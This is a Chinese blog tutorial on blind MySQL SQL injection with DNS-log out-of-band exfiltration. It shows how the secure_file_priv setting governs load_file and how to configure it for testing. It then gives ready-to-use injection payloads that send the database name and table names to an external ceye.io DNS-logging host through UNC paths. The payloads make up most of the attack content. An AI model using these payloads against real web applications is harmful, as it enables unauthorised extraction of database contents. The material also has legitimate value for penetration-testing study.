dnslog在mysql在linux_mysql dnslog外带注入

注入时无回显时可尝试使用dnslog外带注入

mysql dnslog外带要用到load_file()函数的,需要当前数据库用户有读权限,并且需要设置secure_file_priv。

C:\phpStudy\PHPTutorial\MySQL\bin>mysql -uroot -p

Enter password: ****

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 138

Server version: 5.5.53 MySQL Community Server (GPL)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

1. secure_file_priv为null    表示不允许导入导出

2. secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹

3. secure_file_priv没有设置时,则表示没有任何限制

将secure_file_priv 设置为空,方便测试

mysql> show variables like '%secure%';

+------------------+-------+

| Variable_name | Value |

+------------------+-------+

| secure_auth | OFF |

| secure_file_priv | NULL |

+------------------+-------+

2 rows in set (0.02 sec)

mysql>

windows:修改my.ini 在[mysqld]内加入secure_file_priv =

linux:修改my.cnf 在[mysqld]内加入secure_file_priv =

fcc1465cada77b20acaf5a883407f49b.png

重启mysql,设置成功

38a758ee10eefa74554110da9ea9ef1b.png

dnslog平台搭建:https://github.com/BugScanTeam/DNSLog

在线平台:http://ceye.io/

这里用在线平台

8cf90f53aa7fbcb5859bfb3d59d47fe8.png

payload:id=1' and (select load_file(concat('\\\\',(select database()),'.xxxxxx.ceye.io\\abc')))%23

162e8de5a88d1a362197785ab779021d.png

7cfb13e7f9f55b815f357d885d258045.png

查询表:

id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1),'.xxxxx.ceye.io\\abc')))%23

id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.xxxxx.ceye.io\\abc')))%23

4e9a14c4fcd6c918a885f306d4596ad9.png

9eb9e144d8ffa0c028b2d078fa99de87.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值